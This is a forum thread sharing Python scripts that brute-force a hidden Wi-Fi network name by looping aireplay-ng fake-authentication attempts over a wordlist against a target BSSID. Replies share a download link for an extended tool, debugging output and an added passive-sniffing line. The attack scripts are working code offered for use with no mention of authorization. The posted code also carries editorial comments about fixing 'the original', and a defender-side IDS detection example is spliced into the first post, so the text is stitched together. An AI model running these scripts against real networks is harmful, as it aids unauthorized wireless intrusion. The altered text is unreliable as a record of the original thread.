Thread: Useful python scripts - Brute hidden SSID

  1. #1
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Useful python scripts - Brute hidden SSID

    I only wrote one of these scripts but did add airmon-ng support to the one I didn't.

    The hidden SSID brute force attack is demonstrated in the video below as part of a broader framework.

    Skip ahead to 2:44 for the hidden SSID demo.
    Sorry there is no awesome music to jam out to.
    http://vimeo.com/31786626 Comments on the video will be appreciated.

    The script parts (not the framework) are below... (I just started messing around with Python so this is an experiment)

    Might be useful to someone
    Kill all monitor interfaces
    Code:
    #!/usr/bin/python
    
    import subprocess
    
    # read the file /proc/net/dev
    f = open('/proc/net/dev', 'r')
    
    # write to list
    ifacelist = f.read().split('\n')
    
    # close the file
    f.close()
    
    # remove the first 2 lines (column headers, not interfaces)
    ifacelist.pop(0)
    ifacelist.pop(0)
    
    for line in ifacelist:
    
        # "name:counters" after spaces are removed
        ifacedata = line.replace(' ', '').split(':')
    
        # narrow down selection to real interface lines
        if len(ifacedata) == 2:
    
            # verify interface is up (the concatenated counters are all zero otherwise)
            if int(ifacedata[1]) > 0:
    
                # find iface (add list function)
                string = ifacedata[0]
                if string in ('mon0', 'mon1', 'mon2', 'mon3', 'mon4', 'ath0', 'ath1'):
                    print('\nmonitor interface found - Putting it down')
                    # stop the interface by name; the original looped over ifacedata,
                    # which also passed the counter string to airmon-ng
                    subprocess.call(["airmon-ng", "stop", string])
    brute hidden ssid script
    Code:
    #!/usr/bin/python
    
    
    # script created by Tony 'albatr0ss' Di Bernardo, October 2011
    # you are free to re-use the code as long as you give credit to the author in your works
    
    import subprocess
    import sys
    from subprocess import Popen, PIPE
    
    class bcolors:
        HEADER = '\033[95m'
        OKBLUE = '\033[94m'
        OKGREEN = '\033[92m'
        WARNING = '\033[93m'
        FAIL = '\033[91m'
        ENDC = '\033[0m'
    
        def disable(self):
            self.HEADER = ''
            self.OKBLUE = ''
            self.OKGREEN = ''
            self.WARNING = ''
            self.FAIL = ''
            self.ENDC = ''
    
    # four arguments are required (the original checked for 3 and then read sys.argv[4])
    if len(sys.argv) < 5:
        print('Usage: ' + sys.argv[0] + ' bssid essid_list channel interface')
        sys.exit(-1)
    
    bssid = sys.argv[1]
    essid_list = sys.argv[2]
    channel = sys.argv[3]
    interface = sys.argv[4]
    
    # airmon-ng puts the card in monitor mode; the monitor interface it creates is
    # assumed to be mon0 (the original hardcoded the same name further down)
    subprocess.call(["airmon-ng", "start", interface, channel])
    mon_iface = 'mon0'
    
    print('Searching name for Access Point ' + bssid + ' using file ' + essid_list)
    
    f = open(essid_list, 'r')
    
    for temp in f:
        # strip only the line ending; the original removed every non-word character,
        # so names containing spaces or dashes could never match
        essid = temp.rstrip('\r\n')
        if not essid:
            continue
        print('Trying Essid: ' + essid)
        # '-T' and '1' must be separate argv elements
        c = Popen(['aireplay-ng', '--fakeauth', '0', '-T', '1', '-a', bssid, '-e', essid, mon_iface],
                  stdout=PIPE, universal_newlines=True)
        output = c.communicate()[0]
    
        # search the whole output rather than a fixed line number, which raised
        # IndexError whenever aireplay-ng printed fewer than 7 lines
        if 'Association successful' in output:
            print(bcolors.WARNING + '\nFound! Access Point ' + bssid + ' Essid is ' + essid + bcolors.ENDC)
            subprocess.call(["airmon-ng", "stop", mon_iface])
            sys.exit(0)
    
    f.close()
    print(bcolors.FAIL + '\nEssid not in file ' + essid_list + ' for Access Point ' + bssid + bcolors.ENDC)
    Last edited by Scamentology; 11-09-2011 at 08:25 AM.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein
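    As an added, defender-side example (not part of the original post or of the scripts above): the fakeauth loop above produces one station sending association requests with a different SSID each time to the same BSSID until one succeeds. The code below parses constructed log lines in a hypothetical wireless-IDS format (assumed, not any real product's format) and flags exactly that pattern.

```python
import re
from collections import defaultdict

# Constructed sample lines (not from any real product or from this thread), in a
# hypothetical wireless-IDS format: time, action, station MAC, target BSSID, SSID, result.
SAMPLE_LOG = """\
12:00:01 assoc-req sta=00:11:22:33:44:55 bssid=aa:bb:cc:dd:ee:01 ssid=linksys result=fail
12:00:02 assoc-req sta=00:11:22:33:44:55 bssid=aa:bb:cc:dd:ee:01 ssid=netgear result=fail
12:00:03 assoc-req sta=00:11:22:33:44:55 bssid=aa:bb:cc:dd:ee:01 ssid=dlink result=fail
12:00:04 assoc-req sta=00:11:22:33:44:55 bssid=aa:bb:cc:dd:ee:01 ssid=default result=fail
12:00:05 assoc-req sta=00:11:22:33:44:55 bssid=aa:bb:cc:dd:ee:01 ssid=Office WiFi result=success
12:00:06 assoc-req sta=66:77:88:99:aa:bb bssid=aa:bb:cc:dd:ee:01 ssid=Office WiFi result=success
this line is noise and is skipped by the parser
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) assoc-req sta=(?P<sta>\S+) bssid=(?P<bssid>\S+) '
                     r'ssid=(?P<ssid>.*?) result=(?P<result>\w+)$')

def parse_line(line):
    """Fields of one association-request line, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def find_ssid_guessing(lines, threshold=3):
    """Group attempts by (station, BSSID); report pairs where one station asked the same
    BSSID for at least `threshold` distinct SSIDs. A normal client requests one SSID per
    BSSID; a name-guessing loop yields a run of failures, each with a new SSID."""
    attempts = defaultdict(lambda: {'ssids': set(), 'failures': 0, 'first': None, 'last': None})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = attempts[(rec['sta'], rec['bssid'])]
        entry['ssids'].add(rec['ssid'])
        if rec['result'] != 'success':
            entry['failures'] += 1
        entry['first'] = entry['first'] or rec['ts']
        entry['last'] = rec['ts']
    return {key: {'ssids': sorted(e['ssids']), 'failures': e['failures'],
                  'first': e['first'], 'last': e['last']}
            for key, e in attempts.items() if len(e['ssids']) >= threshold}

if __name__ == '__main__':
    for (sta, bssid), info in find_ssid_guessing(SAMPLE_LOG.splitlines()).items():
        print('%s tried %d SSIDs against %s from %s to %s (%d failures)' % (
            sta, len(info['ssids']), bssid, info['first'], info['last'], info['failures']))
```

    The second station in the sample, which requests a single SSID, is not reported; on real data the threshold and a time window are the knobs to tune against legitimate roaming clients.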

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Useful python scripts - Brute hidden SSID

    Hi,
    Great!!!! Thanks for your work.

  3. #3
    Just burned their ISO
    Join Date
    Dec 2010
    Posts
    20

    Default Re: Useful python scripts - Brute hidden SSID

    How do I save the script? Can I save it in Notepad (Windows) as brute.ph?

  4. #4
    Junior Member leg3nd's Avatar
    Join Date
    Feb 2011
    Posts
    32

    Default Re: Useful python scripts - Brute hidden SSID

    Cool idea, I went ahead and added a couple of other things I thought may be useful to this concept.

    One thing you will need for mine to work is to fully install airdrop-ng; follow the README in the tar.gz to do that. It is pretty simple.

    hiddenSSID-Finder: info-s3curity.com/80211/hiddenSSID.tar.gz

    Thanks for the idea. It only took a couple of hours on this, so let me know if you find bugs.
    Last edited by leg3nd; 11-29-2011 at 04:12 AM.

    JasagerPwn: http://code.google.com/p/jasagerpwn/
    Information s3curity: http://info-s3curity.com/

  5. #5
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: Useful python scripts - Brute hidden SSID

    Quote Originally Posted by leg3nd View Post
    Cool idea, I went ahead and added a couple of other things I thought may be useful to this concept.

    One thing you will need for mine to work is to fully install airdrop-ng; follow the README in the tar.gz to do that. It is pretty simple.

    hiddenSSID-Finder: info-s3curity.com/80211/hiddenSSID.tar.gz

    Thanks for the idea. It only took a couple of hours on this, so let me know if you find bugs.
    I found some time to look at this. I see what you're going for. Good idea.

    First bug:
    Code:
    Enter your choice: 1
    [!] Attack Status: Scanning for hidden access points..
    Script Error: local variable 'essidParse2' referenced before assignment
    Fixed that by pushing lines 140 and 143 forward, but then it loops forever without putting the device in monitor mode:
    Code:
    [!] Attack Status: Scanning for hidden access points..                                                                                                         
    [!] Attack Status: Scanning for hidden access points..                                                                                                         
    [!] Attack Status: Scanning for hidden access points..                                                                                                         
    ^C[~] SSID Finder - Exiting with elegance...
    Got this for both attack modes 1 and 3.

    On to modes 2 and 4. I got this on 2:
    Code:
    Enter your choice: 2
    Enter target BSSID(MAC): 00:00:00:00:00:00
    Enter target channel: 1
    [!] Attack Status: Checking Access Point Packets: 00:00:00:00:00:00[*] Attack Success: Found Hidden SSID:   @ 00:00:00:00:00:00
    [*] Outputting Cracked Hidden SSIDs...
    Hidden SSID:   @ 00:00:00:00:00:00
    I am sure the ESSID is in the list. I assume it's supposed to reveal itself after the "Hidden SSID:" part.

    In mode 4 it skipped over the ESSID. It was the second one in the list, but it did list it during the attack.

    I will help you troubleshoot this more later when I have extra time (if that exists) and would like to include this tool in my arsenal.

    Another idea was to find a way to improve the speed of the brute force somehow. Maybe throw all the packets out quickly and parse the .csv file when it's done. This takes forever the way it is now.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  6. #6
    Junior Member leg3nd's Avatar
    Join Date
    Feb 2011
    Posts
    32

    Default Re: Useful python scripts - Brute hidden SSID

    One thing that causes issues with the brute force idea is that if the hidden network is WPA, aireplay-ng fakeauth cannot always associate to it even if you specify the correct ESSID. Oddly enough, it worked on one of my access points running WPA but not the second one running WPA, both with the exact same encryption type.

    After trying to figure out a way to do that manually, I'm not sure it's really possible with aireplay's output. I think increasing the brute force speed may be difficult; I thought about using the "-q" option with aireplay fakeauth, which would shorten the keep-alive time, but it could sacrifice stability.

    Let me know whether it still skips over the ESSID if you disable WPA.


    UPDATE: I fixed both the bugs mentioned above as well as a couple others. Same download link.
    Last edited by leg3nd; 11-30-2011 at 03:08 AM.

    JasagerPwn: http://code.google.com/p/jasagerpwn/
    Information s3curity: http://info-s3curity.com/

  7. #7
    Just burned their ISO
    Join Date
    Dec 2010
    Posts
    20

    Default Re: Useful python scripts - Brute hidden SSID

    Where can I download the script itself?

  8. #8
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: Useful python scripts - Brute hidden SSID

    Ah, very nice.

    I added this as a passive attack as number 5 and moved the exit down to 6:

    os.system('ssidsniff -i %s> /dev/null'%mIface)

    I haven't tested it yet but thought I would share the idea.

    This would make it a well rounded tool for its purpose.

    Quote Originally Posted by leg3nd View Post
    One thing that causes issues with the brute force idea is that if the hidden network is WPA, aireplay-ng fakeauth cannot always associate to it even if you specify the correct ESSID. Oddly enough, it worked on one of my access points running WPA but not the second one running WPA, both with the exact same encryption type.

    After trying to figure out a way to do that manually, I'm not sure it's really possible with aireplay's output. I think increasing the brute force speed may be difficult; I thought about using the "-q" option with aireplay fakeauth, which would shorten the keep-alive time, but it could sacrifice stability.

    Let me know whether it still skips over the ESSID if you disable WPA.


    UPDATE: I fixed both the bugs mentioned above as well as a couple others. Same download link.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  9. #9
    Junior Member leg3nd's Avatar
    Join Date
    Feb 2011
    Posts
    32

    Default Re: Useful python scripts - Brute hidden SSID

    Cool, didn't know that existed. I added it like you said.

    JasagerPwn: http://code.google.com/p/jasagerpwn/
    Information s3curity: http://info-s3curity.com/
